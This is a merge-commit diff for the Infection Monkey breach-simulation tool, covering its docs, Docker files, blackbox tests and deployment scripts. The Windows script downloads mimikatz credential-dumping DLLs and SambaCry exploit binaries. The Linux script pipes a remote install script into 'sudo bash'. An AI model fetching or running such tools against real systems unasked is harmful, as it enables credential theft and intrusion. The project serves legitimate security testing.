Merge pull request #1 from guardicore/develop

Updating my local fork
Shivank 2019-10-28 15:14:53 +05:30 committed by GitHub
commit 4518b93260
448 changed files with 26046 additions and 7070 deletions

.gitignore

@ -68,3 +68,19 @@ bin
/monkey/monkey_island/cc/server.crt
/monkey/monkey_island/cc/server.csr
/monkey/monkey_island/cc/ui/node_modules/
# User files
/monkey/monkey_island/cc/userUploads
# MonkeyZoo
# Network status files
MonkeyZoo/*
# Except
!MonkeyZoo/main.tf
!MonkeyZoo/variables.tf
!MonkeyZoo/README.MD
!MonkeyZoo/config.tf
!MonkeyZoo/MonkeyZooDocs.pdf
# vim swap files
*.swp


@ -3,12 +3,6 @@ language: python
cache: pip
python:
- 2.7
- 3.6
matrix:
include:
- python: 3.7
dist: xenial # required for Python 3.7 (travis-ci/travis-ci#9069)
sudo: required # required for Python 3.7 (travis-ci/travis-ci#9069)
install:
#- pip install -r requirements.txt
- pip install flake8 # pytest # add other testing frameworks later


@ -2,11 +2,13 @@
Thanks for your interest in making the Monkey -- and therefore, your network -- a better place!
Are you about to report a bug? Sorry to hear it. Here's our [Issue tracker](https://github.com/guardicore/monkey/issues).
Are you about to report a bug? Sorry to hear it. Here's our
[Issue tracker](https://github.com/guardicore/monkey/issues).
Please try to be as specific as you can about your problem; try to include steps
to reproduce. While we'll try to help anyway, focusing us will help us help you faster.
If you want to contribute new code or fix bugs..
If you want to contribute new code or fix bugs, please read the following sections. You can also contact us (the
maintainers of this project) at our [Slack channel](https://join.slack.com/t/infectionmonkey/shared_invite/enQtNDU5MjAxMjg1MjU1LTM2ZTg0ZDlmNWNlZjQ5NDI5NTM1NWJlYTRlMGIwY2VmZGMxZDlhMTE2OTYwYmZhZjM1MGZhZjA2ZjI4MzA1NDk).
## Submitting code
@ -20,7 +22,17 @@ The following is a *short* list of recommendations. PRs that don't match these c
* **Don't** leave your pull request description blank.
* **Do** license your code as GPLv3.
Also, please submit PRs to the develop branch.
Also, please submit PRs to the `develop` branch.
#### Unit tests
**Do** add unit tests if you think it fits. We place our unit tests in the same folder as the code, with the same
filename, followed by the _test suffix. So for example: `somefile.py` will be tested by `somefile_test.py`.
Please try to read some of the existing unit testing code, so you can see some examples.
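For illustration only, a minimal (hypothetical) example of this convention, with the test living next to the module it covers; the module, test names, and the use of `unittest` here are assumptions, so check the existing tests for the framework actually in use:
```python
# somefile.py (hypothetical module)
def add(a, b):
    return a + b
```
```python
# somefile_test.py (hypothetical unit test, placed in the same folder as somefile.py)
import unittest

from somefile import add


class AddTest(unittest.TestCase):
    def test_add(self):
        self.assertEqual(add(1, 2), 3)


if __name__ == '__main__':
    unittest.main()
```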
#### Branch naming scheme
**Do** name your branches in accordance with GitFlow. The format is `ISSUE_#/BRANCH_NAME`; for example,
`400/zero-trust-mvp` or `232/improvment/hide-linux-on-cred-maps`.
## Issues
* **Do** write a detailed description of your bug and use a descriptive title.


@ -30,7 +30,6 @@ The Infection Monkey uses the following techniques and exploits to propagate to
* Multiple exploit methods:
* SSH
* SMB
* RDP
* WMI
* Shellshock
* Conficker
@ -41,10 +40,13 @@ Setup
-------------------------------
Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or the quick [getting started guide](https://www.guardicore.com/infectionmonkey/wt/).
The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility).
Building the Monkey from source
-------------------------------
If you want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself)
To deploy a development version of the monkey, refer to the readme in the [deployment scripts](deployment_scripts) folder.
If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself)
and follow the instructions in the readme files under [infection_monkey](infection_monkey) and [monkey_island](monkey_island).


@ -0,0 +1,24 @@
# Files used to deploy a development version of Infection Monkey
## Windows
Before running the script, you must have git installed.<br>
`cd` to the scripts directory and use the scripts.<br>
The first argument is an empty directory (the script can create one) and the second is the branch you want to clone.
Example usages:<br>
./run_script.bat (Sets up monkey in current directory under .\infection_monkey)<br>
./run_script.bat "C:\test" (Sets up monkey in C:\test)<br>
powershell -ExecutionPolicy ByPass -Command ". .\deploy_windows.ps1; Deploy-Windows -monkey_home C:\test" (Same as above)<br>
./run_script.bat "" "master" (Sets up the master branch instead of develop in the current dir)
Don't forget to add Python to PATH or do so while installing it via this script.<br>
## Linux
You must have root permissions, but don't run the script as root.<br>
Launch deploy_linux.sh from the scripts directory.<br>
The first argument should be an empty directory (the script can create one, default is ./infection_monkey) and the second is the branch you want to clone (develop by default).
Choose a directory where you have all the relevant permissions, e.g. /home/your_username
Example usages:<br>
./deploy_linux.sh (deploys under ./infection_monkey)<br>
./deploy_linux.sh "/home/test/monkey" (deploys under /home/test/monkey)<br>
./deploy_linux.sh "" "master" (deploys master branch in script directory)<br>
./deploy_linux.sh "/home/user/new" "master" (if directory "new" is not found creates it and clones master branch into it)<br>

deployment_scripts/config

@ -0,0 +1,19 @@
#!/usr/bin/env bash
# Monkey folder name
MONKEY_FOLDER_NAME="infection_monkey"
# Url of public git repository that contains monkey's source code
MONKEY_GIT_URL="https://github.com/guardicore/monkey"
# Monkey binaries
LINUX_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32"
LINUX_32_BINARY_NAME="monkey-linux-32"
LINUX_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-64"
LINUX_64_BINARY_NAME="monkey-linux-64"
WINDOWS_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-32.exe"
WINDOWS_32_BINARY_NAME="monkey-windows-32.exe"
WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe"
WINDOWS_64_BINARY_NAME="monkey-windows-64.exe"
# Mongo URLs
MONGO_DEBIAN_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-debian81-latest.tgz"
MONGO_UBUNTU_URL="https://downloads.mongodb.org/linux/mongodb-linux-x86_64-ubuntu1604-latest.tgz"


@ -0,0 +1,48 @@
# Monkey folder name
$MONKEY_FOLDER_NAME = "infection_monkey"
# Url of public git repository that contains monkey's source code
$MONKEY_GIT_URL = "https://github.com/guardicore/monkey"
# Link to the latest python download or install it manually
$PYTHON_URL = "https://www.python.org/ftp/python/2.7.13/python-2.7.13.amd64.msi"
# Monkey binaries
$LINUX_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-32"
$LINUX_32_BINARY_PATH = "monkey-linux-32"
$LINUX_64_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-linux-64"
$LINUX_64_BINARY_PATH = "monkey-linux-64"
$WINDOWS_32_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-32.exe"
$WINDOWS_32_BINARY_PATH = "monkey-windows-32.exe"
$WINDOWS_64_BINARY_URL = "https://github.com/guardicore/monkey/releases/download/1.6/monkey-windows-64.exe"
$WINDOWS_64_BINARY_PATH = "monkey-windows-64.exe"
$SAMBA_32_BINARY_URL = "https://github.com/VakarisZ/tempBinaries/raw/master/sc_monkey_runner32.so"
$SAMBA_32_BINARY_NAME= "sc_monkey_runner32.so"
$SAMBA_64_BINARY_URL = "https://github.com/VakarisZ/tempBinaries/raw/master/sc_monkey_runner64.so"
$SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
# Other directories and paths (most likely you don't need to configure these)
$MONKEY_ISLAND_DIR = "\monkey\monkey_island"
$MONKEY_DIR = "\monkey\infection_monkey"
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\exploit\sambacry_monkey_runner"
$PYTHON_DLL = "C:\Windows\System32\python27.dll"
$MK32_DLL = "mk32.dll"
$MK64_DLL = "mk64.dll"
$TEMP_PYTHON_INSTALLER = ".\python.msi"
$TEMP_MONGODB_ZIP = ".\mongodb.zip"
$TEMP_OPEN_SSL_ZIP = ".\openssl.zip"
$TEMP_CPP_INSTALLER = "cpp.exe"
$TEMP_NPM_INSTALLER = "node.msi"
$TEMP_PYWIN32_INSTALLER = "pywin32.exe"
$TEMP_UPX_ZIP = "upx.zip"
$TEMP_VC_FOR_PYTHON27_INSTALLER = "vcforpython.msi"
$UPX_FOLDER = "upx394w"
# Other URLs
$VC_FOR_PYTHON27_URL = "https://download.microsoft.com/download/7/9/6/796EF2E4-801B-4FC4-AB28-B59FBF6D907B/VCForPython27.msi"
$MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2008plus-ssl-latest.zip"
$OPEN_SSL_URL = "https://indy.fulgan.com/SSL/Archive/openssl-1.0.2l-i386-win32.zip"
$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572"
$NPM_URL = "https://nodejs.org/dist/v10.13.0/node-v10.13.0-x64.msi"
$PYWIN32_URL = "https://github.com/mhammond/pywin32/releases/download/b224/pywin32-224.win-amd64-py2.7.exe"
$UPX_URL = "https://github.com/upx/upx/releases/download/v3.94/upx394w.zip"
$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.dll"
$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.dll"


@ -0,0 +1,139 @@
#!/bin/bash
source config
# Set up the monkey either in the requested dir or the current dir
monkey_home=${1:-`pwd`}
if [[ $monkey_home == `pwd` ]]; then
monkey_home="$monkey_home/$MONKEY_FOLDER_NAME"
fi
# We can set main paths after we know the home dir
ISLAND_PATH="$monkey_home/monkey/monkey_island"
MONKEY_COMMON_PATH="$monkey_home/monkey/common/"
MONGO_PATH="$ISLAND_PATH/bin/mongodb"
MONGO_BIN_PATH="$MONGO_PATH/bin"
ISLAND_DB_PATH="$ISLAND_PATH/db"
ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries"
handle_error () {
echo "Fix the errors above and rerun the script"
exit 1
}
log_message () {
echo -e "\n\n-------------------------------------------"
echo -e "DEPLOYMENT SCRIPT: $1"
echo -e "-------------------------------------------\n"
}
sudo -v
if [[ $? != 0 ]]; then
echo "You need root permissions for some of this script operations. Quiting."
exit 1
fi
if [[ ! -d ${monkey_home} ]]; then
mkdir -p ${monkey_home}
fi
git --version &>/dev/null
git_available=$?
if [[ ${git_available} != 0 ]]; then
echo "Please install git and re-run this script"
exit 1
fi
log_message "Cloning files from git"
branch=${2:-"develop"}
if [[ ! -d "$monkey_home/monkey" ]]; then # If not already cloned
git clone --single-branch -b $branch ${MONKEY_GIT_URL} ${monkey_home} 2>&1 || handle_error
chmod 774 -R ${monkey_home}
fi
# Create folders
log_message "Creating island dirs under $ISLAND_PATH"
mkdir -p ${MONGO_BIN_PATH}
mkdir -p ${ISLAND_DB_PATH}
mkdir -p ${ISLAND_BINARIES_PATH} || handle_error
python_version=`python --version 2>&1`
if [[ ${python_version} == *"command not found"* ]] || [[ ${python_version} != *"Python 2.7"* ]]; then
echo "Python 2.7 is not found or is not a default interpreter for 'python' command..."
exit 1
fi
log_message "Updating package list"
sudo apt-get update
log_message "Installing pip"
sudo apt-get install python-pip
log_message "Installing island requirements"
requirements="$ISLAND_PATH/requirements.txt"
python -m pip install --user -r ${requirements} || handle_error
# Download binaries
log_message "Downloading binaries"
wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_32_BINARY_URL}
wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_64_BINARY_URL}
wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_32_BINARY_URL}
wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_64_BINARY_URL}
# Allow them to be executed
chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_32_BINARY_NAME"
chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_64_BINARY_NAME"
# Get machine type/kernel version
kernel=`uname -m`
linux_dist=`lsb_release -a 2> /dev/null`
# If the user hasn't installed mongo manually, check if we can install it with our script
log_message "Installing MongoDB"
${ISLAND_PATH}/linux/install_mongo.sh ${MONGO_BIN_PATH} || handle_error
log_message "Installing openssl"
sudo apt-get install openssl
# Generate SSL certificate
log_message "Generating certificate"
cd ${ISLAND_PATH} || handle_error
openssl genrsa -out cc/server.key 1024 || handle_error
openssl req -new -key cc/server.key -out cc/server.csr \
-subj "/C=GB/ST=London/L=London/O=Global Security/OU=Monkey Department/CN=monkey.com" || handle_error
openssl x509 -req -days 366 -in cc/server.csr -signkey cc/server.key -out cc/server.crt || handle_error
sudo chmod +x ${ISLAND_PATH}/linux/create_certificate.sh || handle_error
${ISLAND_PATH}/linux/create_certificate.sh || handle_error
# Install npm
log_message "Installing npm"
sudo apt-get install npm
# Update node
log_message "Updating node"
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -
sudo apt-get install -y nodejs
log_message "Generating front end"
cd "$ISLAND_PATH/cc/ui" || handle_error
npm update
npm run dist
# Monkey setup
log_message "Installing monkey requirements"
sudo apt-get install python-pip python-dev libffi-dev upx libssl-dev libc++1
cd ${monkey_home}/monkey/infection_monkey || handle_error
python -m pip install --user -r requirements_linux.txt || handle_error
# Build samba
log_message "Building samba binaries"
sudo apt-get install gcc-multilib
cd ${monkey_home}/monkey/infection_monkey/exploit/sambacry_monkey_runner
sudo chmod +x ./build.sh || handle_error
./build.sh
sudo chmod +x ${monkey_home}/monkey/infection_monkey/build_linux.sh
log_message "Deployment script finished."
exit 0


@ -0,0 +1,215 @@
function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, [String] $branch = "develop"){
# Import the config variables
. ./config.ps1
"Config variables from config.ps1 imported"
# If we want monkey in current dir we need to create an empty folder for source files
if ( (Join-Path $monkey_home '') -eq (Join-Path (Get-Item -Path ".\").FullName '') ){
$monkey_home = Join-Path -Path $monkey_home -ChildPath $MONKEY_FOLDER_NAME
}
# Set variables for script execution
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
$webClient = New-Object System.Net.WebClient
# We check if git is installed
try
{
git | Out-Null -ErrorAction Stop
"Git requirement satisfied"
}
catch [System.Management.Automation.CommandNotFoundException]
{
"Please install git before running this script or add it to path and restart cmd"
return
}
# Download the monkey
$output = cmd.exe /c "git clone --single-branch -b $branch $MONKEY_GIT_URL $monkey_home 2>&1"
$binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\bin")
if ( $output -like "*already exists and is not an empty directory.*"){
"Assuming you already have the source directory. If not, make sure to set an empty directory as monkey's home directory."
} elseif ($output -like "fatal:*"){
"Error while cloning monkey from the repository:"
$output
return
} else {
"Monkey cloned from the repository"
# Create bin directory
New-Item -ItemType directory -path $binDir
"Bin directory added"
}
# We check if python is installed
try
{
$version = cmd.exe /c '"python" --version 2>&1'
if ( $version -like 'Python 2.7.*' ) {
"Python 2.7.* was found, installing dependancies"
} else {
throw System.Management.Automation.CommandNotFoundException
}
}
catch [System.Management.Automation.CommandNotFoundException]
{
"Downloading python 2.7 ..."
$webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER)
Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
Remove-Item $TEMP_PYTHON_INSTALLER
# Check if installed correctly
$version = cmd.exe /c '"python" --version 2>&1'
if ( $version -like '* is not recognized*' ) {
"Python is not found in PATH. Add it manually or reinstall python."
return
}
}
# Set python home dir
$PYTHON_PATH = Split-Path -Path (Get-Command python | Select-Object -ExpandProperty Source)
# Get vcforpython27 before installing requirements
"Downloading Visual C++ Compiler for Python 2.7 ..."
$webClient.DownloadFile($VC_FOR_PYTHON27_URL, $TEMP_VC_FOR_PYTHON27_INSTALLER)
Start-Process -Wait $TEMP_VC_FOR_PYTHON27_INSTALLER -ErrorAction Stop
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
Remove-Item $TEMP_VC_FOR_PYTHON27_INSTALLER
# Install requirements for island
$islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
"Upgrading pip..."
$output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1'
$output
if ( $output -like '*No module named pip*' ) {
"Make sure pip module is installed and re-run this script."
return
}
& python -m pip install --user -r $islandRequirements
# Install requirements for monkey
$monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements_windows.txt"
& python -m pip install --user -r $monkeyRequirements
# Download mongodb
if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb") )){
"Downloading mongodb ..."
$webClient.DownloadFile($MONGODB_URL, $TEMP_MONGODB_ZIP)
"Unzipping mongodb"
Expand-Archive $TEMP_MONGODB_ZIP -DestinationPath $binDir
# Get unzipped folder's name
$mongodb_folder = Get-ChildItem -Path $binDir | Where-Object -FilterScript {($_.Name -like "mongodb*")} | Select-Object -ExpandProperty Name
# Move all files from extracted folder to mongodb folder
New-Item -ItemType directory -Path (Join-Path -Path $binDir -ChildPath "mongodb")
New-Item -ItemType directory -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "db")
"Moving extracted files"
Move-Item -Path (Join-Path -Path $binDir -ChildPath $mongodb_folder | Join-Path -ChildPath "\bin\*") -Destination (Join-Path -Path $binDir -ChildPath "mongodb\")
"Removing zip file"
Remove-Item $TEMP_MONGODB_ZIP
Remove-Item (Join-Path -Path $binDir -ChildPath $mongodb_folder) -Recurse
}
# Download OpenSSL
"Downloading OpenSSL ..."
$webClient.DownloadFile($OPEN_SSL_URL, $TEMP_OPEN_SSL_ZIP)
"Unzipping OpenSSl"
Expand-Archive $TEMP_OPEN_SSL_ZIP -DestinationPath (Join-Path -Path $binDir -ChildPath "openssl") -ErrorAction SilentlyContinue
"Removing zip file"
Remove-Item $TEMP_OPEN_SSL_ZIP
# Download and install C++ redistributable
"Downloading C++ redistributable ..."
$webClient.DownloadFile($CPP_URL, $TEMP_CPP_INSTALLER)
Start-Process -Wait $TEMP_CPP_INSTALLER -ErrorAction Stop
Remove-Item $TEMP_CPP_INSTALLER
# Generate ssl certificate
"Generating ssl certificate"
Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR)
. .\windows\create_certificate.bat
Pop-Location
# Adding binaries
"Adding binaries"
$binaries = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\cc\binaries")
New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
$webClient.DownloadFile($LINUX_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_32_BINARY_PATH))
$webClient.DownloadFile($LINUX_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $LINUX_64_BINARY_PATH))
$webClient.DownloadFile($WINDOWS_32_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_32_BINARY_PATH))
$webClient.DownloadFile($WINDOWS_64_BINARY_URL, (Join-Path -Path $binaries -ChildPath $WINDOWS_64_BINARY_PATH))
# Check if NPM installed
"Installing npm"
try
{
$version = cmd.exe /c '"npm" --version 2>&1'
if ( $version -like "*is not recognized*"){
throw System.Management.Automation.CommandNotFoundException
} else {
"Npm already installed"
}
}
catch [System.Management.Automation.CommandNotFoundException]
{
"Downloading npm ..."
$webClient.DownloadFile($NPM_URL, $TEMP_NPM_INSTALLER)
Start-Process -Wait $TEMP_NPM_INSTALLER
$env:Path = [System.Environment]::GetEnvironmentVariable("Path","Machine")
Remove-Item $TEMP_NPM_INSTALLER
}
"Updating npm"
Push-Location -Path (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\cc\ui")
& npm update
& npm run dist
Pop-Location
# Install pywin32
"Downloading pywin32"
$webClient.DownloadFile($PYWIN32_URL, $TEMP_PYWIN32_INSTALLER)
Start-Process -Wait $TEMP_PYWIN32_INSTALLER -ErrorAction Stop
Remove-Item $TEMP_PYWIN32_INSTALLER
# Create infection_monkey/bin directory if not already present
$binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\bin")
New-Item -ItemType directory -path $binaries -ErrorAction SilentlyContinue
# Download upx
if(!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "upx.exe") )){
"Downloading upx ..."
$webClient.DownloadFile($UPX_URL, $TEMP_UPX_ZIP)
"Unzipping upx"
Expand-Archive $TEMP_UPX_ZIP -DestinationPath $binDir -ErrorAction SilentlyContinue
Move-Item -Path (Join-Path -Path $binDir -ChildPath $UPX_FOLDER | Join-Path -ChildPath "upx.exe") -Destination $binDir
# Remove unnecessary files
Remove-Item -Recurse -Force (Join-Path -Path $binDir -ChildPath $UPX_FOLDER)
"Removing zip file"
Remove-Item $TEMP_UPX_ZIP
}
# Download mimikatz binaries
$mk32_path = Join-Path -Path $binDir -ChildPath $MK32_DLL
if(!(Test-Path -Path $mk32_path )){
"Downloading mimikatz 32 binary"
$webClient.DownloadFile($MK32_DLL_URL, $mk32_path)
}
$mk64_path = Join-Path -Path $binDir -ChildPath $MK64_DLL
if(!(Test-Path -Path $mk64_path )){
"Downloading mimikatz 64 binary"
$webClient.DownloadFile($MK64_DLL_URL, $mk64_path)
}
# Download sambacry binaries
$samba_path = Join-Path -Path $monkey_home -ChildPath $SAMBA_BINARIES_DIR
$samba32_path = Join-Path -Path $samba_path -ChildPath $SAMBA_32_BINARY_NAME
if(!(Test-Path -Path $samba32_path )){
"Downloading sambacry 32 binary"
$webClient.DownloadFile($SAMBA_32_BINARY_URL, $samba32_path)
}
$samba64_path = Join-Path -Path $samba_path -ChildPath $SAMBA_64_BINARY_NAME
if(!(Test-Path -Path $samba64_path )){
"Downloading sambacry 64 binary"
$webClient.DownloadFile($SAMBA_64_BINARY_URL, $samba64_path)
}
"Script finished"
}


@ -0,0 +1,8 @@
SET command=. .\deploy_windows.ps1; Deploy-Windows
if NOT "%~1" == "" (
SET "command=%command% -monkey_home %~1"
)
if NOT "%~2" == "" (
SET "command=%command% -branch %~2"
)
powershell -ExecutionPolicy ByPass -Command %command%

docker/.dockerignore

@ -0,0 +1 @@
*.md


@ -1,19 +1,24 @@
FROM debian:jessie-slim
FROM debian:stretch-slim
LABEL MAINTAINER="theonlydoo <theonlydoo@gmail.com>"
ARG RELEASE=1.6
ARG DEBIAN_FRONTEND=noninteractive
EXPOSE 5000
WORKDIR /app
ADD https://github.com/guardicore/monkey/releases/download/1.5.2/infection_monkey_1.5.2_deb.tgz .
ADD https://github.com/guardicore/monkey/releases/download/${RELEASE}/infection_monkey_deb.${RELEASE}.tgz .
RUN tar xvf infection_monkey_1.5.2_deb.tgz \
&& apt-get -yqq update \
&& apt-get -yqq upgrade \
&& apt-get -yqq install python-pip \
libssl-dev \
supervisor \
&& dpkg -i *.deb
RUN tar xvf infection_monkey_deb.${RELEASE}.tgz \
&& apt-get -yqq update \
&& apt-get -yqq upgrade \
&& apt-get -yqq install python-pip \
python-dev \
&& dpkg -i *.deb \
&& rm -f *.deb *.tgz
COPY stack.conf /etc/supervisor/conf.d/stack.conf
ENTRYPOINT [ "supervisord", "-n", "-c", "/etc/supervisor/supervisord.conf" ]
WORKDIR /var/monkey
ENTRYPOINT ["/var/monkey/monkey_island/bin/python/bin/python"]
CMD ["/var/monkey/monkey_island.py"]

docker/docker-compose.yml

@ -0,0 +1,22 @@
version: '3.3'
services:
db:
image: mongo:4
restart: always
volumes:
- db_data:/data/db
environment:
MONGO_INITDB_DATABASE: monkeyisland
monkey:
depends_on:
- db
build: .
image: monkey:latest
ports:
- "5000:5000"
environment:
MONGO_URL: mongodb://db:27017/monkeyisland
volumes:
db_data:


@ -1,4 +0,0 @@
[program:mongod]
command=/var/monkey_island/bin/mongodb/bin/mongod --quiet --dbpath /var/monkey_island/db
[program:monkey]
command=/var/monkey_island/ubuntu/systemd/start_server.sh

envs/__init__.py

envs/monkey_zoo/.gitignore

@ -0,0 +1 @@
logs/


@ -0,0 +1,3 @@
# MonkeyZoo
These files are used to deploy Infection Monkey's test network on GCP.<br>
For more information, see docs/fullDocs.md


@ -0,0 +1,19 @@
# Automatic blackbox tests
### Prerequisites
1. Download the Google Cloud SDK: https://cloud.google.com/sdk/docs/
2. Download the service account key for the MonkeyZoo project (if you deployed MonkeyZoo via the terraform scripts then you already have it).
GCP console -> IAM -> service accounts (you can use the same key used to authenticate the terraform scripts)
3. Deploy the relevant branch + compiled executables to the Island machine on GCP.
### Running the tests
In order to execute the entire test suite, you must know the external IP of the Island machine on GCP. You can find
this information in the GCP Console `Compute Engine/VM Instances` under _External IP_.
#### Running in command line
Run the following command:
`monkey\envs\monkey_zoo\blackbox>python -m pytest --island=35.207.152.72:5000 test_blackbox.py`
#### Running in PyCharm
Configure a PyTest run configuration with the additional argument `--island=35.207.152.72` on the
`monkey\envs\monkey_zoo\blackbox` directory.
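For orientation, here is a minimal sketch of what a blackbox test could look like, assuming the `island` fixture from `conftest.py` and the `MonkeyIslandClient` helper (both part of this changeset); the test name and assertion are hypothetical:
```python
# Hypothetical example test; relies on the `island` fixture defined in conftest.py
# and on MonkeyIslandClient from island_client/monkey_island_client.py.
from envs.monkey_zoo.blackbox.island_client.monkey_island_client import MonkeyIslandClient


def test_island_api_is_up(island):
    # `island` holds the address passed via --island, e.g. "35.207.152.72:5000"
    client = MonkeyIslandClient(island)
    assert client.get_api_status().ok
```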


@ -0,0 +1,17 @@
LOG_INIT_MESSAGE = "Analysis didn't run."


class AnalyzerLog(object):

    def __init__(self, analyzer_name):
        self.contents = LOG_INIT_MESSAGE
        self.name = analyzer_name

    def clear(self):
        self.contents = ""

    def add_entry(self, message):
        self.contents = "{}\n{}".format(self.contents, message)

    def get_contents(self):
        return "{}: {}\n".format(self.name, self.contents)


@ -0,0 +1,24 @@
from envs.monkey_zoo.blackbox.analyzers.analyzer_log import AnalyzerLog


class CommunicationAnalyzer(object):

    def __init__(self, island_client, machine_ips):
        self.island_client = island_client
        self.machine_ips = machine_ips
        self.log = AnalyzerLog(self.__class__.__name__)

    def analyze_test_results(self):
        self.log.clear()
        all_monkeys_communicated = True
        for machine_ip in self.machine_ips:
            if not self.did_monkey_communicate_back(machine_ip):
                self.log.add_entry("Monkey from {} didn't communicate back".format(machine_ip))
                all_monkeys_communicated = False
            else:
                self.log.add_entry("Monkey from {} communicated back".format(machine_ip))
        return all_monkeys_communicated

    def did_monkey_communicate_back(self, machine_ip):
        query = {'ip_addresses': {'$elemMatch': {'$eq': machine_ip}}}
        return len(self.island_client.find_monkeys_in_db(query)) > 0


@ -0,0 +1,11 @@
import pytest


def pytest_addoption(parser):
    parser.addoption("--island", action="store", default="",
                     help="Specify the Monkey Island address (host+port).")


@pytest.fixture(scope='module')
def island(request):
    return request.config.getoption("--island")


@ -0,0 +1,18 @@
import json
import os


class IslandConfigParser(object):

    def __init__(self, config_filename):
        self.config_raw = open(IslandConfigParser.get_conf_file_path(config_filename), 'r').read()
        self.config_json = json.loads(self.config_raw)

    def get_ips_of_targets(self):
        return self.config_json['basic_network']['general']['subnet_scan_list']

    @staticmethod
    def get_conf_file_path(conf_file_name):
        return os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
                            "island_configs",
                            conf_file_name)


@ -0,0 +1,87 @@
from time import sleep
import json
import logging

from bson import json_util

from envs.monkey_zoo.blackbox.island_client.monkey_island_requests import MonkeyIslandRequests

SLEEP_BETWEEN_REQUESTS_SECONDS = 0.5
MONKEY_TEST_ENDPOINT = 'api/test/monkey'
LOG_TEST_ENDPOINT = 'api/test/log'
LOGGER = logging.getLogger(__name__)


def avoid_race_condition(func):
    sleep(SLEEP_BETWEEN_REQUESTS_SECONDS)
    return func


class MonkeyIslandClient(object):

    def __init__(self, server_address):
        self.requests = MonkeyIslandRequests(server_address)

    def get_api_status(self):
        return self.requests.get("api")

    @avoid_race_condition
    def import_config(self, config_contents):
        _ = self.requests.post("api/configuration/island", data=config_contents)

    @avoid_race_condition
    def run_monkey_local(self):
        response = self.requests.post_json("api/local-monkey", dict_data={"action": "run"})
        if MonkeyIslandClient.monkey_ran_successfully(response):
            LOGGER.info("Running the monkey.")
        else:
            LOGGER.error("Failed to run the monkey.")
            assert False

    @staticmethod
    def monkey_ran_successfully(response):
        return response.ok and json.loads(response.content)['is_running']

    @avoid_race_condition
    def kill_all_monkeys(self):
        if self.requests.get("api", {"action": "killall"}).ok:
            LOGGER.info("Killing all monkeys after the test.")
        else:
            LOGGER.error("Failed to kill all monkeys.")
            assert False

    @avoid_race_condition
    def reset_env(self):
        if self.requests.get("api", {"action": "reset"}).ok:
            LOGGER.info("Resetting environment after the test.")
        else:
            LOGGER.error("Failed to reset the environment.")
            assert False

    def find_monkeys_in_db(self, query):
        if query is None:
            raise TypeError
        response = self.requests.get(MONKEY_TEST_ENDPOINT,
                                     MonkeyIslandClient.form_find_query_for_request(query))
        return MonkeyIslandClient.get_test_query_results(response)

    def get_all_monkeys_from_db(self):
        response = self.requests.get(MONKEY_TEST_ENDPOINT,
                                     MonkeyIslandClient.form_find_query_for_request(None))
        return MonkeyIslandClient.get_test_query_results(response)

    def find_log_in_db(self, query):
        response = self.requests.get(LOG_TEST_ENDPOINT,
                                     MonkeyIslandClient.form_find_query_for_request(query))
        return MonkeyIslandClient.get_test_query_results(response)

    @staticmethod
    def form_find_query_for_request(query):
        return {'find_query': json_util.dumps(query)}

    @staticmethod
    def get_test_query_results(response):
        return json.loads(response.content)['results']

    def is_all_monkeys_dead(self):
        query = {'dead': False}
        return len(self.find_monkeys_in_db(query)) == 0


